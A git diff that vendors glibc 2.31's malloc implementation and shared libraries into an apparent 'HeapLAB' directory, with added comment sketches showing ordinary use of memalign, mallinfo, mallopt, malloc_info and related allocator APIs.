+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
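+
+/*
+  A minimal illustrative sketch (not part of glibc): the public memalign()
+  wrapper eventually lands in _int_memalign() above, which over-allocates
+  by (alignment + MINSIZE), carves an aligned chunk out of the result and
+  gives the leading and trailing remainders back to the arena.  Assumes
+  glibc's <malloc.h> declaration of memalign().
+
+    #include <stdlib.h>
+    #include <stdint.h>
+    #include <assert.h>
+    #include <malloc.h>
+
+    int main(void)
+    {
+      void *p = memalign(0x1000, 100);        // 4 KiB alignment, 100 bytes
+      assert(((uintptr_t) p & 0xfff) == 0);   // returned pointer is aligned
+      free(p);                                // freed like any other chunk
+      return 0;
+    }
+*/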
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
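+
+/*
+  A minimal illustrative sketch (not part of glibc): because musable()
+  reports the chunk size minus the header, the value returned for an
+  in-use allocation is usually larger than what was requested -- the
+  padding up to the chunk boundary is usable.
+
+    #include <stdio.h>
+    #include <stdlib.h>
+    #include <malloc.h>
+
+    int main(void)
+    {
+      void *p = malloc(10);
+      // Prints at least 10; typically 24 on 64-bit glibc for this request.
+      printf("usable: %zu\n", malloc_usable_size(p));
+      free(p);
+      return 0;
+    }
+*/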
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
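+
+/*
+  A minimal illustrative sketch (not part of glibc): mallinfo() returns
+  the struct filled in by int_mallinfo() above, summed over every arena.
+  Only fields written above are used here.
+
+    #include <stdio.h>
+    #include <malloc.h>
+
+    int main(void)
+    {
+      struct mallinfo mi = mallinfo();
+      printf("heap from system : %d bytes\n", mi.arena);
+      printf("free chunks      : %d (%d bytes)\n", mi.ordblks, mi.fordblks);
+      printf("in use           : %d bytes\n", mi.uordblks);
+      printf("trimmable top    : %d bytes\n", mi.keepcost);
+      return 0;
+    }
+*/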
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static __always_inline int
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static __always_inline int
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static __always_inline int
+do_set_tcache_max (size_t value)
+{
+  if (value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_tcache_count (size_t value)
+{
+  if (value <= MAX_TCACHE_COUNT)
+    {
+      LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+      mp_.tcache_count = value;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+static inline int
+__always_inline
+do_set_mxfast (size_t value)
+{
+  if (value <= MAX_FAST_SIZE)
+    {
+      LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+      set_max_fast (value);
+      return 1;
+    }
+  return 0;
+}
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  /* Many of these helper functions take a size_t.  We do not worry
+     about overflow here, because negative int values will wrap to
+     very large size_t values and the helpers have sufficient range
+     checking for such conversions.  Many of these helpers are also
+     used by the tunables macros in arena.c.  */
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      res = do_set_mxfast (value);
+      break;
+
+    case M_TRIM_THRESHOLD:
+      res = do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      res = do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      res = do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      res = do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      res = do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	res = do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	res = do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
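+
+/*
+  A minimal illustrative sketch (not part of glibc): mallopt() maps each
+  parameter onto one of the do_set_* helpers above after consolidating
+  the main arena.  For example, M_MXFAST resizes the fastbins (0 disables
+  them) and M_PERTURB makes the allocator scribble over freed memory,
+  which helps expose use-after-free bugs.
+
+    #include <malloc.h>
+
+    int main(void)
+    {
+      mallopt(M_MXFAST, 0);       // do_set_mxfast(0): no fastbin caching
+      mallopt(M_PERTURB, 0xaa);   // do_set_perturb_byte(): freed memory is
+                                  // filled with 0xaa, new allocations with 0x55
+      return 0;
+    }
+*/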
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+         *ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
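+
+/*
+  A minimal illustrative sketch (not part of glibc): __posix_memalign()
+  above rejects alignments that are zero, not a power of two, or not a
+  multiple of sizeof (void *) with EINVAL, and reports failure through
+  the return value rather than through errno.
+
+    #include <stdio.h>
+    #include <stdlib.h>
+
+    int main(void)
+    {
+      void *p = NULL;
+      int rc = posix_memalign(&p, 64, 1024);  // 64 is a power-of-two
+                                              // multiple of sizeof (void *)
+      if (rc != 0)                            // EINVAL or ENOMEM, not errno
+        {
+          fprintf(stderr, "posix_memalign failed: %d\n", rc);
+          return 1;
+        }
+      free(p);
+      return 0;
+    }
+*/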
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      /* Account for top chunk.  The top-most available chunk is
+	 treated specially and is never in any bin. See "initial_top"
+	 comments.  */
+      avail = chunksize (ar_ptr->top);
+      nblocks = 1;  /* Top always exists.  */
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "\
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
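+
+/*
+  A minimal illustrative sketch (not part of glibc): malloc_info() streams
+  the XML document built above -- one <heap> element per arena plus
+  process-wide totals -- to the given FILE *; options must currently be 0.
+
+    #include <stdio.h>
+    #include <stdlib.h>
+    #include <malloc.h>
+
+    int main(void)
+    {
+      malloc(1);               // make sure the allocator is initialised
+      malloc_info(0, stdout);  // emits <malloc version="1"> ... </malloc>
+      return 0;
+    }
+*/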
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.31_no-tcache/ld-2.31.so b/HeapLAB/.glibc/glibc_2.31_no-tcache/ld-2.31.so
new file mode 100755
index 0000000..1513383
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.31_no-tcache/ld-2.31.so differ
diff --git a/HeapLAB/.glibc/glibc_2.31_no-tcache/ld.so.2 b/HeapLAB/.glibc/glibc_2.31_no-tcache/ld.so.2
new file mode 120000
index 0000000..2e1e932
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.31_no-tcache/ld.so.2
@@ -0,0 +1 @@
+ld-2.31.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.31_no-tcache/libc-2.31.so b/HeapLAB/.glibc/glibc_2.31_no-tcache/libc-2.31.so
new file mode 100755
index 0000000..6711df5
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.31_no-tcache/libc-2.31.so differ
diff --git a/HeapLAB/.glibc/glibc_2.31_no-tcache/libc.so.6 b/HeapLAB/.glibc/glibc_2.31_no-tcache/libc.so.6
new file mode 120000
index 0000000..524d6c6
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.31_no-tcache/libc.so.6
@@ -0,0 +1 @@
+libc-2.31.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.31_no-tcache/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.31_no-tcache/malloc/malloc.c
new file mode 100644
index 0000000..f7cd29b
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.31_no-tcache/malloc/malloc.c
@@ -0,0 +1,5610 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2020 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
